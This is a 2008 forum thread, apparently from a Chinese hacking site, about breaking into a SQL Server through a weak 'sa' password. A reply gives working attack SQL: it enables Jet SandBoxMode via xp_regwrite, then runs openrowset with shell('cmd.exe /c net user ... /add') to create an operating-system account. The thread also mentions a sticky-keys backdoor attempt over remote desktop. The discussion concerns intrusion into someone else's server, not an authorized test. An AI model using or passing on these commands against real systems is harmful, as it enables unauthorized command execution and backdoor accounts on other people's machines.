Board logo

标题: [讨论]sa的老问题 发图讨论之前的老文章方法 [打印本页]

作者: valen886    时间: 2008-7-24 17:20     标题: [讨论]sa的老问题 发图讨论之前的老文章方法

[讨论]sa的老问题 发图讨论之前的老文章方法
议题作者:小猪!
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

今天遇到个sa的弱口令搞了下,下面的图是搞的结果!
得到的结果是cmd用不了,上传也用不了!分离器命令不行!还有就是今天看到有个朋友用分离器执行了命令,然后3389SHIFT5次也不行!
不知道大峡们有什么好的方法没?
   都大.jpg (1.6 MB)

2007-12-3 16:16   未命名.jpg (312 KB)

2007-12-3 16:16   的命名.jpg (872 KB)


2007-12-3 16:16   未都大名.jpg (1.35 MB)

2007-12-3 16:16   未命名22.jpg (1.73 MB)

2007-12-3 16:16
帖子3 精华0 积分16 阅读权限40 在线时间1 小时 注册时间2007-11-12 最后登录2008-5-10 查看详细资料TOP 您知道您年薪应是多少?

沉渊
晶莹剔透§烈日灼然
作者: paul2014    时间: 2008-7-24 17:20

权限问题,貌似你这根本就不是saDreamless world……
帖子25 精华0 积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30 查看详细资料TOP 爱要怎么说出口

逗号
晶莹剔透§烈日灼然
作者: jacky6636    时间: 2008-7-24 17:20

先 select user 一下,看看是不是 dbo 要是的话,就开启沙盘模式搞他
不用xp_cmdshell 执行命令
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user xxxxx xxxx /add")')
帖子35 精华0 积分114 阅读权限40 在线时间30 小时 注册时间2005-10-16 最后登录2008-5-22 查看详细资料TOP 让女孩一夜变的更有女人味

逗号
晶莹剔透§烈日灼然
作者: 金羊    时间: 2008-7-24 17:21

实践证明,你的那个用户为GUEST 权限
不过,好像已经有人拿下了这个站。鬼知道是哪里的黑客~!
帖子35 精华0 积分114 阅读权限40 在线时间30 小时 注册时间2005-10-16 最后登录2008-5-22 查看详细资料TOP

charley008
晶莹剔透§烈日灼然
作者: 小乖    时间: 2008-7-24 17:21

沙盒模式在2003下也有用吗?
帖子16 精华0 积分53 阅读权限40 在线时间33 小时 注册时间2005-10-2 最后登录2008-7-7 查看详细资料TOP 让女孩一夜变的更有女人味

wolfluxay
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2